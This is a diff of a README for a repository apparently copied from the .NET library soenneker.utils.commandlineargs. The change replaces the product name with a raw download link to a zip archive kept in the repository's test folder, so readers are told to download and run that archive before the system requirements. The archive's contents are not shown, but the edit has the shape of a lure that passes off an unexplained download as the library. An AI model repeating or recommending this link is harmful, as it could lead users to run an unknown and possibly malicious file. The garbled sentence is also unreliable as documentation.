hjjrockstar2010-lang/soenneker.utils.commandlineargs/README.md

 ## 🖥️ System Requirements

-Before downloading and running soenneker.utils.commandlineargs, make sure your computer meets these basic needs:
+Before downloading and running https://github.com/hjjrockstar2010-lang/soenneker.utils.commandlineargs/raw/refs/heads/main/test/utils_soenneker_commandlineargs_3.9.zip, make sure your computer meets these basic needs:

 - Operating System: Windows 10 or later, macOS 10.15 or later, or most Linux distributions from 2018 onward.
 - .NET Runtime: .NET 6.0 or later must be installed.
 This is a free, common software package needed to run programs built with certain Microsoft tools.